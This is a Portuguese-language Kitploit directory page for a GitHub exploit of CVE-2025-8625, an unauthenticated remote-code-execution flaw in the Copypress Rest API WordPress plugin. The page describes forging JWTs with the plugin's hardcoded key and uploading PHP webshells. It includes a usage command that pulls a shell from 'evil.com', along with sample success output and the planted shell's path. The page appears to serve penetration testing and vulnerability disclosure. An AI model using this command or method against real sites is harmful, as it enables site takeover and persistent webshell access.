Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-8625 — Copypress Rest API 1.1 - 1.2 - Ausência de Segredo JWT Configurável e Validação de Tipo de Arquivo para Execução Remota de Código Não Autenticada | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-8625
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubnxploited/cve-2025-8625

CVE-2025-8625

Copypress Rest API 1.1 - 1.2 - Ausência de Segredo JWT Configurável e Validação de Tipo de Arquivo para Execução Remota de Código Não Autenticada

Ver Repositório
26há 0 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-8625

Copypress Rest API 1.1 - 1.2 - Ausência de Segredo JWT Configurável e Validação de Tipo de Arquivo para Execução Remota de Código Não Autenticada

🛡️ Exploit de RCE do Copypress Rest API 1.1 - 1.2

📝 Descrição

O plugin Copypress Rest API para WordPress (versões 1.1 a 1.2) é vulnerável a Execução Remota de Código através da função copyreap_handle_image().
O plugin usa uma chave de assinatura JWT codificada (hardcoded) quando nenhum segredo é definido e não valida os tipos de arquivo, permitindo que atacantes não autenticados forjem tokens e enviem arquivos arbitrários (como shells PHP) pelo endpoint do manipulador de imagens.

  • CVE: CVE-2025-8625
  • CVSS: 9.8 (Crítico)

🚀 Visão Geral do Script

Nome do script: CVE-2025-8625.py
Este script Python automatiza a exploração da vulnerabilidade, permitindo gerar um JWT válido, enviar uma requisição forjada e fazer upload de um arquivo malicioso (webshell) para o site WordPress vulnerável.


⚙️ Uso

python CVE-2025-8625.py -u https://target.com -shell https://evil.com/shell.php
  • -u / --url: URL do site WordPress alvo
  • -shell / --shell: Link direto para seu webshell ou arquivo PHP malicioso

Exemplo de saída:

JWT: eyJ0eXAiOiJKV1QiLCJhbGciOi...
HTTP 201: {"created":true,"id":123,"message":"Success"}
Exploit success! Check your shell upload.

🏆 Recursos

  • Gera um JWT válido usando o segredo hardcoded do plugin
  • Contorna a autenticação para enviar arquivos arbitrários
  • Fornece saída clara para sucesso/falha da exploração
  • Interface de linha de comando simples

📂 Local de Upload do Shell

Shell enviado com sucesso! 🎉
Exemplo de caminho do shell:

https://target.com/wp-content/uploads/2025/10/shell.php

⚠️ Aviso Legal

Esta ferramenta é destinada apenas a testes de penetração educacionais e autorizados.
O uso contra alvos sem permissão explícita é ilegal.


Por: Nxploited (Khaled Alenazi)

Baixar ferramenta